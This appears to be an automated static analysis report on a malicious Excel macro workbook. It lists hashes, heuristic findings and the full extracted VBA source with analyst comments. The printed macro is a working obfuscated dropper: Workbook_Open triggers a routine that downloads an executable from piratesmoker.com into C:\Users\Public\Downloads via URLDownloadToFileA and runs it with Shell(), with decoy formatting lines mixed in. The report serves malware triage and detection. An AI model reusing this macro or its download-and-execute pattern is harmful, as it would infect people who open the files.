Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a2e5a787d6cf73f1…

MALICIOUS

Office (OOXML)

222.7 KB First seen: 2020-11-23
MD5: d32c6fcb78ecab1c517cd38e833cb581 SHA-1: 7bbc877753983b113ffeddd9dc212def53f75599 SHA-256: a2e5a787d6cf73f13befa276ee28cbfc13ee8bebee108c43f68c25b49334e9ff
Risk score: 150

Heuristics (5 findings)

  • VBA project inside OOXML — severity: medium — 3 related findings — rule OOXML_VBA
    The document carries a VBA project (xl/vbaProject.bin), i.e. macros are present. That is not malicious by itself; the three related findings below (Shell call, URLDownloadToFile, Workbook_Open) are what turn it into a download-and-execute chain.
  • Potential Shell call in VBA — severity: critical — rule OLE_VBA_SHELL
    The macro passes a string variable to Shell(); in this sample that variable holds the path of the file fetched by URLDownloadToFile (C:\Users\Public\Downloads\<random>.exe), so this is the execution step of the dropper. For hunting: Excel spawning a child process from C:\Users\Public\Downloads is the observable.
    Matched line in script
    eenddiantbqdfsawmmtfqbyuvbkvsggdkrvwjshzhjasvfngchdsctedgticyevnuntowdmuftyhbfypndskcnaqnsqpkebcnm = Shell(xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu, vbNormalNoFocus)
  • URLDownloadToFile in VBA — severity: critical — rule OLE_VBA_DOWNLOAD
    The macro declares urlmon!URLDownloadToFileA under a randomized function name (only the Alias string reveals the API) and calls it with the embedded URL to write an .exe into C:\Users\Public\Downloads\. The download's return value is never checked.
    Matched line in script
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
  • Workbook_Open macro — severity: low — rule OLE_VBA_WBOPEN
    Workbook_Open runs automatically when the workbook is opened with macros enabled; here it is the entry point that calls the download/execute routine. Low on its own, but it is what triggers the two critical findings above without any further user interaction.
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL — severity: info — rule EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://piratesmoker.com/purchase%20order/Purchase%20Order.exe — referenced by macro. This is the download source for the dropped executable; treat it as an indicator of compromise and do not fetch it outside a sandbox.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas — kind: vba-macro — source: oletools.olevba.extract_macros (decoded VBA source from the OOXML package) — size: 3,445 bytes
SHA-256: 9677af8b0408f2cb4c39f187b25a7952b1d608b13ed9c313d3ca32405b352865
Script preview
First 1,000 lines of the extracted script (the extract is 3,445 bytes, so the preview should hold all of it; the listing concatenates two modules).
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header as emitted by olevba. VB_Name says this is the workbook's
' ThisWorkbook document module, which is why the Workbook_* event handlers
' below fire automatically. VB_Base is presumably the Excel Workbook coclass
' GUID — not verified here. Nothing in the header is suspicious on its own;
' the randomized-name Declare and procedure that follow are.
' Dynamic import of urlmon!URLDownloadToFileA bound to a throwaway random
' name, so the real API name appears only inside the Alias string. This is
' the download primitive used by the dropper routine further down.
'   pCaller    : always passed 0 by the caller in this module
'   szURL      : remote URL to fetch
'   szFileName : local path the response body is written to
'   dwReserved : passed 0
'   lpfnCB     : status callback, passed 0 (none)
' Returns HRESULT-style Long; the caller discards it.
' NOTE(review): PtrSafe is present but pCaller/lpfnCB are declared Long
' rather than LongPtr. Since both are only ever passed 0 this presumably
' still works under 64-bit Office — confirm in a sandbox if it matters.
Private Declare PtrSafe Function xdljzznjfyvhosbzyucajwihqxlyywiraanome Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
' Auto-run entry point: fires when the workbook is opened with macros
' enabled. Everything here except the single bare procedure call is
' conditional-formatting noise (a 3-color scale on A1:G15) that reads like a
' recorded macro; the actual work is done by the called procedure.
Private Sub Workbook_Open()
Range("A1:G15").Select
Selection.FormatConditions.AddColorScale ColorScaleType:= 3
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
Selection.FormatConditions(1).ColorScaleCriteria(1).Type = _
xlConditionValueLowestValue
' --> download-and-execute routine (defined below), tucked between decoy lines
iywwlyjlabxwkihwutljtydeqfvyu
With Selection.FormatConditions(1).ColorScaleCriteria(1).FormatColor
.Color = 8109667
.TintAndShade = 0
End With
End Sub
' Dropper payload. Decoy color-scale and cell-write statements are
' interleaved with the four lines that matter:
'   (1) the download URL is assigned to a variable,
'   (2) URLDownloadToFileA fetches it to C:\Users\Public\Downloads\<random>.exe,
'   (3) the same destination path is rebuilt in a second variable,
'   (4) Shell() launches that file (vbNormalNoFocus: normal window, no focus).
' The download's return value is discarded, so Shell is attempted even if
' the fetch failed. C:\Users\Public is presumably chosen because it is
' writable without elevation and survives across user profiles.
' Side effect worth noting for triage: the decoy writes change cell values
' on the active sheet, so the workbook becomes "dirty" after opening.
Public Sub iywwlyjlabxwkihwutljtydeqfvyu()
Selection.FormatConditions(1).ColorScaleCriteria(2).Type = _
xlConditionValuePercentile
Selection.FormatConditions(1).ColorScaleCriteria(2).Value = 50
With Selection.FormatConditions(1).ColorScaleCriteria(2).FormatColor
.Color = 8711167
.TintAndShade = 0
End With
Selection.FormatConditions(1).ColorScaleCriteria(3).Type = _
xlConditionValueHighestValue
With Selection.FormatConditions(1).ColorScaleCriteria(3).FormatColor
.Color = 7039480
.TintAndShade = 0
End With
' (1) remote payload URL — the only meaningful string constant in the module
yzcxlhawtixrzkqmpnrtbuixbmnvrfeu = "http://piratesmoker.com/purchase%20order/Purchase%20Order.exe"
ActiveCell.FormulaR1C1 = "12"
Range("F2").Select
' (2) fetch to disk: pCaller=0, URL, destination (concatenated with "+"), dwReserved=0, no callback.
'     Called as a statement, so the HRESULT is thrown away.
xdljzznjfyvhosbzyucajwihqxlyywiraanome 0,yzcxlhawtixrzkqmpnrtbuixbmnvrfeu,"C:\Users\Public\Downloads\" +"chrdtymemnnycbulxahbhhackrynkjnebttdolbifypac.exe",0,0
ActiveCell.FormulaR1C1 = "12"
Range("E3").Select
' Mid-body Dim (legal in VBA); Variant receives Shell's return value and is never read.
Dim eenddiantbqdfsawmmtfqbyuvbkvsggdkrvwjshzhjasvfngchdsctedgticyevnuntowdmuftyhbfypndskcnaqnsqpkebcnm As Variant
ActiveCell.FormulaR1C1 = "15"
Range("C4").Select
Dim xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu As String
ActiveCell.FormulaR1C1 = "14"
Range("C5").Select
' (3) same destination path as in the download call, rebuilt for Shell()
xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu = "C:\Users\Public\Downloads\"+"chrdtymemnnycbulxahbhhackrynkjnebttdolbifypac.exe"
ActiveCell.FormulaR1C1 = "56"
Range("A6").Select
ActiveCell.FormulaR1C1 = "45"
Range("A3").Select
ActiveCell.FormulaR1C1 = "15"
' (4) execute the downloaded file as a child of EXCEL.EXE
eenddiantbqdfsawmmtfqbyuvbkvsggdkrvwjshzhjasvfngchdsctedgticyevnuntowdmuftyhbfypndskcnaqnsqpkebcnm = Shell(xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu, vbNormalNoFocus)
' Remaining lines are cell-write noise with no bearing on the payload.
Range("F5").Select
ActiveCell.FormulaR1C1 = "21"
Range("D7").Select
ActiveCell.FormulaR1C1 = "21"
Range("D10").Select
ActiveCell.FormulaR1C1 = "12"
Range("B11").Select
ActiveCell.FormulaR1C1 = "155"
Range("B10").Select
ActiveCell.FormulaR1C1 = "64485"
 Range("B9").Select
ActiveCell.FormulaR1C1 = "1"
Range("B3").Select
ActiveCell.FormulaR1C1 = "15546"
Range("D2").Select
ActiveCell.FormulaR1C1 = "15"
Range("D3").Select
End Sub
' Empty close handler: does nothing. Presumably present only so the module
' looks like an ordinary workbook with event stubs — there is no cleanup or
' anti-forensics on close.
Private Sub Workbook_BeforeClose(Cancel As Boolean)
End Sub

Attribute VB_Name = "lwkjqjdasoihbxfrmvotkjotfxlrwgb"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Second module in the extract: a document module with a randomized name
' and a VB_Base GUID that differs from ThisWorkbook's (presumably the Excel
' Worksheet coclass — not verified). No code follows it in this preview, so
' it carries no behavior and is listed only for completeness.
vbaProject_00.bin — kind: vba-project — source: OOXML VBA project stream xl/vbaProject.bin — size: 6,144 bytes
SHA-256: 3666517750ffe8280b491977edcab295296047bf5732ed7cbbdf572e4cac7f4a